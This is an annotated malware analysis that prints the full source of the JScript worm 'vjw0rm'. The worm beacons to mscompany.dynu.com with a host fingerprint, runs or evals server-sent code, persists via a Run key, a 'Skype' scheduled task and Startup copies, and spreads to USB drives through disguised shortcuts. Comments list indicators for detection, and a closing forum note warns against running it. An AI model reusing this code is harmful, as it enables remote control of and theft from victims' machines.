// Analyst annotation of a JScript worm sample (the registry marker it writes below names it
// "vjw0rm"). The code is left untouched; the notes describe what each statement does so that
// the artifacts it leaves (registry values, scheduled task, temp/Startup copies, .lnk files on
// removable drives) and its network beacon can be recognised. The original Chinese comments are
// translated, and the original annotator's guesses are marked as such.
// COM ProgIDs instantiated through Cr(N): 0 shell, 1 filesystem, 2 Shell.Application, 3 XMLHTTP.
var j = ["WScript.Shell", "Scripting.FileSystemObject", "Shell.Application", "Microsoft.XMLHTTP"]; | |
// Registry fragments: g[2] HKCU\vjw0rm is the infection marker, g[0]+g[3] the per-user Run key,
// g[4] and g[6] are used for default-icon lookups in Spr(), g[5] is the value type.
var g = ["HKCU", "HKLM", "HKCU\\vjw0rm", "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "HKLM\\SOFTWARE\\Classes\\", "REG_SZ", "\\defaulticon\\"]; | |
// WMI moniker and class names used by Ob() and Spr() for fingerprinting and drive enumeration.
var y = ["winmgmts:", "win32_logicaldisk", "Win32_OperatingSystem", 'AntiVirusProduct']; | |
// sh: WScript.Shell (registry, process launch); fs: Scripting.FileSystemObject (copies, drives).
var sh = Cr(0); | |
var fs = Cr(1); | |
// Field separator of the server reply parsed in the command loop below.
var spl = "|V|"; | |
var Ch = "\\"; | |
var VN = "21" + "_" + Ob(6); //Ob(6) returns the volume serial number; if it is 1111-1111 then VN = 21_1111-1111. This identifier leads the fingerprint string built by nf(). | |
// Absolute path and bare file name of this script; both are reused by Ns() and Spr().
var fu = WScript.ScriptFullName; | |
var wn = WScript.ScriptName; | |
// U: infection marker read from HKCU\vjw0rm; it is also reported to the server inside nf().
var U; | |
try { | |
//read the HKEY_CURRENT_USER marker value | |
U = sh.RegRead(g[2]); | |
//RegRead throws when HKCU\vjw0rm does not exist yet, i.e. on first run | |
} catch (err) { | |
//split this script's absolute path into its components | |
var sv = fu.split("\\"); | |
//true when the script sits directly in a drive root (the second path component is the file name) | |
if (":\\" + sv[1] == ":\\" + wn) { | |
U = "TRUE"; | |
//create HKCU\vjw0rm as a REG_SZ value holding TRUE | |
sh.RegWrite(g[2], U, g[5]); | |
} else { | |
U = "FALSE"; | |
//create HKCU\vjw0rm as a REG_SZ value holding FALSE | |
sh.RegWrite(g[2], U, g[5]); | |
} | |
} | |
//Ns() installs persistence (temp copy, Run value, scheduled task, Startup copy) before the loop starts | |
Ns(); | |
do { | |
//endless loop: poll the server, act on the reply, sleep, then spread to removable drives | |
try { | |
var P = Pt('Vre', ''); | |
//the reply is split on "|V|" into P[0] command, P[1] payload, P[2] file name (where used) | |
P = P.split(spl); | |
if (P[0] === "Cl") { | |
WScript.Quit(1); | |
} | |
//"Sc": write the data in P[1] to a file named P[2] in the %temp% folder and run it | |
//(the original annotator guessed P[1] may be the main payload; the code only shows write-and-run) | |
if (P[0] === "Sc") { | |
var s2 = Ex("temp") + "\\" + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
//"Ex": evaluate P[1] directly as script code | |
if (P[0] === "Ex") { | |
eval(P[1]); | |
} | |
/* | |
"Rn": | |
1. open this script read-only, read the whole text into fr | |
2. split VN into ["21", "<serial>"] | |
3. replace the first occurrence of VN[0] ("21") in the text with P[1] | |
4. write fr back over this file, relaunch it with wscript //B, then quit | |
5. the original annotator guessed this turns the script into a payload; what is visible is only the identifier rewrite | |
6. the if-blocks below likewise aim at executing server-supplied code carried in P[1] | |
*/ | |
if (P[0] === "Rn") { | |
var ri = fs.OpenTextFile(fu, 1); | |
var fr = ri.ReadAll(); | |
ri.Close(); | |
VN = VN.split("_"); | |
fr = fr.replace(VN[0], P[1]); | |
var wi = fs.OpenTextFile(fu, 2, false); | |
wi.Write(fr); | |
wi.Close(); | |
sh.run("wscript.exe //B \"" + fu + "\""); | |
WScript.Quit(1); | |
} | |
//"Up": write P[1] (with its "|U|" marker rewritten to "|V|") to %temp%\P[2], launch it with wscript //B and quit; presumably an update of the script itself | |
if (P[0] === "Up") { | |
var s2 = Ex("temp") + "\\" + P[2]; | |
var ctf = fs.CreateTextFile(s2, true); | |
var gu = P[1]; | |
gu = gu.replace("|U|", "|V|"); | |
ctf.Write(gu); | |
ctf.Close(); | |
sh.run("wscript.exe //B \"" + s2 + "\"", 6); | |
WScript.Quit(1); | |
} | |
//"Un": fill the placeholders in P[1] with this script's path (%f), name (%n), the temp copy path (%sfdr) and the Run value name (%RgNe%), eval it and quit; the name suggests an uninstall routine | |
if (P[0] === "Un") { | |
var s2 = P[1]; | |
var vdr = Ex("Temp") + Ch + wn; | |
var regi = "OBAJQA1X0B"; | |
s2 = s2.replace("%f", fu).replace("%n", wn).replace("%sfdr", vdr).replace("%RgNe%", regi); | |
eval(s2); | |
WScript.Quit(1); | |
} | |
//"RF": identical to "Sc" -- write P[1] to %temp%\P[2] and run it | |
if (P[0] === "RF") { | |
var s2 = Ex("temp") + "\\" + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
//any failure while polling or handling a command is swallowed and the loop continues | |
} catch (err) {} | |
//7 second pause between polls | |
WScript.Sleep(7000); | |
//propagate to removable drives on every iteration | |
Spr(); | |
} while (true); | |
// Ex: expand the environment variable named S, e.g. Ex("temp") yields the value of %temp%.
function Ex(S) { | |
//expand %S% through WScript.Shell | |
return sh.ExpandEnvironmentStrings("%" + S + "%"); | |
} | |
// Pt: synchronous HTTP POST of A to the server path C; the host fingerprint from nf() travels in
// the User-Agent header. Network indicator: POST to mscompany.dynu.com:7974 with that unusual
// User-Agent value.
function Pt(C, A) { | |
//C = "Vre", A = "" as called from the main loop | |
//create the Microsoft.XMLHTTP object | |
var X = Cr(3); | |
//synchronous POST to http://mscompany.dynu.com:7974/<C> | |
X.open('POST', 'http://mscompany.dynu.com:7974/' + C, false); | |
//header value is the fingerprint, e.g. 21_<serial>\<COMPUTERNAME>\<USERNAME>\<OS caption>\<AV name>\\YES\TRUE; note the header name is written with a trailing colon | |
X.SetRequestHeader("User-Agent:", nf()); | |
//send the request | |
X.send(A); | |
//return the response body | |
return X.responsetext; | |
} | |
// nf: build the backslash-separated host fingerprint string that Pt() sends as the User-Agent.
function nf() { | |
var s, | |
NT//(the original annotator assumes NT is "YES"); this inserted comment swallows the comma that separated NT from i, so as printed the declaration does not parse | |
i; | |
//if %Windir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe exists | |
//%Windir% is usually C:\Windows | |
if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) { | |
//NT = YES | |
NT = "YES"; | |
} else { | |
//otherwise NO | |
NT = "NO"; | |
} | |
s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch; | |
//returns 21_<serial>\%COMPUTERNAME%\%USERNAME%\<OS caption from Ob(2)>\<AV name from Ob(4)>\\<NT>\<U>\ | |
return s; | |
} | |
// Cr: instantiate the COM object whose ProgID is j[N].
function Cr(N) { | |
return new ActiveXObject(j[N]); | |
} | |
// Ob: host fingerprint lookups over WMI; N selects the field (2 OS caption, 4 antivirus name,
// 6 volume serial number). Any other N, or an empty WMI result, falls off the end and returns
// undefined.
function Ob(N) { | |
var s; | |
//return the operating-system caption | |
if (N == 2) { | |
//Win32_OperatingSystem describes the Windows installation on this machine | |
s = GetObject(y[0]).InstancesOf(y[2]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
//Caption names the OS edition, e.g. "Microsoft Windows 7 Enterprise"; the first instance is returned | |
return it.Caption; | |
break; | |
} | |
} | |
//return the name of the installed antivirus product (e.g. "ESET NOD32 Antivirus 4") | |
//the original annotator suspects the server uses this to choose payloads; the code only collects and reports the name | |
if (N == 4) { | |
/* | |
two SecurityCenter namespaces exist: | |
securitycenter: Windows before Vista | |
securitycenter2: Vista and later | |
their schemas differ | |
*/ | |
var wmg = "winmgmts:\\\\localhost\\root\\securitycenter"; | |
s = GetObject(wmg).InstancesOf(y[3]); | |
var en = new Enumerator(s); | |
//walk every AntiVirusProduct; str ends up as the last DisplayName (undefined when there is none) | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
var str = it.DisplayName; | |
} | |
//undefined !== '' is true, so an empty securitycenter result also goes to the securitycenter2 lookup | |
if (str !== '') { | |
wmg = wmg + "2"; | |
s = GetObject(wmg).InstancesOf(y[3]); | |
en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
it = en.item(); | |
return it.DisplayName; | |
} | |
} else { | |
//only reached when DisplayName was exactly ''; it is the last item enumerated above | |
return it.DisplayName; | |
} | |
} | |
//this block returns the volume serial number | |
if (N == 6) { | |
//GetObject("WinMgmts:") connects to WMI | |
//Win32_LogicalDisk represents a logical disk; the first one enumerated is used | |
s = GetObject(y[0]).InstancesOf(y[1]); | |
//Enumerator iterates a COM collection | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
//VolumeSerialNumber is a string of at most 11 characters identifying the volume (e.g. "1111-1111") | |
return it.volumeserialnumber; | |
break; | |
} | |
} | |
} | |
// Ns: persistence. Host indicators: a copy of the script in %TEMP%, the Run value "OBAJQA1X0B"
// pointing at it, a scheduled task named "Skype" (every 30 minutes), and a copy in the user's
// Startup folder. Every step is best-effort; failures are swallowed.
function Ns() { | |
//path of the copy in the user's temp folder (e.g. C:\Users\<user>\AppData\Local\Temp\<script name>) | |
var dr = Ex("TEMP") + Ch + wn; | |
try { | |
//copy this script to the temp folder | |
fs.CopyFile(fu, dr, true); | |
} catch (err) {} | |
try { | |
//create REG_SZ value OBAJQA1X0B under HKCU\Software\Microsoft\Windows\CurrentVersion\Run holding the quoted temp-copy path | |
//so the copy starts with every user session | |
sh.RegWrite(g[0] + g[3] + "OBAJQA1X0B", "\"" + dr + "\"", g[5]); | |
} catch (err) {} | |
try { | |
//create a scheduled task named "Skype" that runs the temp copy every 30 minutes | |
//(the /tr argument opens a quote that is never closed, so the command line as written may be rejected by schtasks) | |
sh.run("Schtasks /create /sc minute /mo 30 /tn Skype /tr \"" + dr, false); | |
} catch (err) {} | |
try { | |
var ap = Cr(2); | |
//copy this script into the user's Startup folder | |
//NameSpace(7) is ssfSTARTUP, the per-user Startup folder | |
fs.CopyFile(fu, ap.NameSpace(7).Self.Path + "\\" + wn, true); | |
} catch (err) {} | |
} | |
// Spr: propagation to removable drives. For every ready drive with DriveType 1 the script copies
// itself there (hidden + system), hides each top-level folder and file, and leaves a same-named
// .lnk that runs cmd.exe to start the script before opening the original item -- the
// "every item on the USB stick became a shortcut" symptom described in the discussion below.
function Spr() { | |
try { | |
//GetObject returns a reference to the object behind the WMI moniker; enumerate all logical disks | |
var ld = GetObject(y[0]).InstancesOf(y[1]); | |
var edi = new Enumerator(ld); | |
for (; !edi.atEnd(); edi.moveNext()) { | |
var dri = edi.item(); | |
//DeviceID : Unique identifier of the logical disk from other devices on the system. | |
//GetDrive returns the FileSystemObject Drive for that device id (dri is reused to hold it) | |
var dri = fs.GetDrive(dri.DeviceID); | |
var dp = dri.Path + "\\"; | |
if (dri.IsReady) { | |
//DriveType 1 is the removable-media type (USB sticks, floppies, external disks) | |
if (dri.DriveType === 1) { | |
//copy this script to the removable drive | |
fs.CopyFile(fu, dp + wn, true); | |
if (fs.FileExists(dp + wn)) { | |
//attributes 2 + 4 = hidden + system | |
fs.GetFile(dp + wn).attributes = 2 + 4; | |
} | |
try { | |
//enumerate all top-level folders on the drive | |
var ef = new Enumerator(fs.GetFolder(dp).SubFolders); | |
for (; !ef.atEnd(); ef.moveNext()) { | |
//take one folder and hide it | |
var gf = ef.item(); | |
gf.attributes = 2 + 4; | |
//quote the first space in the script name for the cmd.exe command line (note: this rewrites the global wn) | |
wn = wn.replace(" ", "\"" + " " + "\""); | |
var n = gf.name; | |
n = n.replace(" ", "\"" + " " + "\""); | |
//create a shortcut named after the folder | |
var sr = sh.CreateShortCut(dp + gf.name + ".lnk"); | |
//the shortcut opens minimised | |
sr.WindowStyle = 7; | |
//the shortcut target is cmd.exe | |
sr.TargetPath = "cmd.exe"; | |
//opening the shortcut starts this script, then opens the real folder in explorer | |
sr.Arguments = "/c start " + wn + "&start explorer " + n + "&exit"; | |
//use the system default folder icon so the .lnk looks like a folder | |
var rp = "HKLM\\software\\classes\\folder\\defaulticon\\"; | |
var fic = sh.RegRead(rp); | |
var ci = sr.IconLocation; | |
var sci = ","; | |
if (ci.indexOf(sci) !== -1) { | |
sr.IconLocation = fic; | |
} else { | |
sr.IconLocation = gf.Path; | |
} | |
sr.Save(); | |
} | |
} catch (err) {} | |
try { | |
//enumerate all top-level files on the drive | |
var efi = new Enumerator(fs.GetFolder(dp).Files); | |
for (; !efi.atEnd(); efi.moveNext()) { | |
//take one file | |
var gfi = efi.item(); | |
var dot = "."; | |
var lnk = "lnk"; | |
if (gfi.name.indexOf(dot) !== -1) { | |
//names containing "lnk" anywhere are skipped (substring test, not an extension check) | |
if (gfi.name.indexOf(lnk) !== -1) {} | |
else { | |
//skip the script's own copy (wn may already carry inserted quotes by now, so this test is not exact) | |
if (gfi.name !== wn) { | |
//mark the real file hidden + system | |
gfi.attributes = 2 + 4; | |
var nu = gfi.name; | |
nu = nu.replace(" ", "\"" + " " + "\""); | |
wn = wn.replace(" ", "\"" + " " + "\""); | |
//same scheme as for folders: hide the original, add a .lnk that launches the script and then the file, and give the .lnk the file type's default icon | |
var shr = sh.CreateShortCut(dp + gfi.name + ".lnk"); | |
shr.WindowStyle = 7; | |
shr.TargetPath = "cmd.exe"; | |
shr.Arguments = "/c start " + wn + "&start " + nu + "&exit"; | |
//look up the extension's ProgID under HKLM\SOFTWARE\Classes\ and then that ProgID's \defaulticon\ value | |
var sgf = gfi.name.split("."); | |
var fvi = sh.RegRead(g[4] + "." + sgf[sgf.length - 1] + "\\"); | |
var fvi2 = sh.RegRead(g[4] + fvi + g[6] + "\\"); | |
var ci = shr.IconLocation; | |
var sci = ","; | |
if (ci.indexOf(sci) !== -1) { | |
shr.IconLocation = fvi2; | |
} else { | |
shr.IconLocation = gfi.Path; | |
} | |
shr.Save(); | |
} | |
} | |
} | |
} | |
} catch (err) {} | |
} | |
} | |
} | |
//any error while enumerating or writing to a drive is swallowed | |
} catch (err) {} | |
} |
這個好像是前陣子流行的 "U盤通通bang捷徑" 的病毒,反正看到U盤通通都是捷徑就不要貿然執行
PS: 可以把WScript host的程式關掉,關掉後就不能執行本腳本了,反正WScript host也沒什麼洨用
PS: 不要執行本腳本
PS: 詳細資料可參考這篇: 趨勢科技資料
基本上小弟推論應該正確= =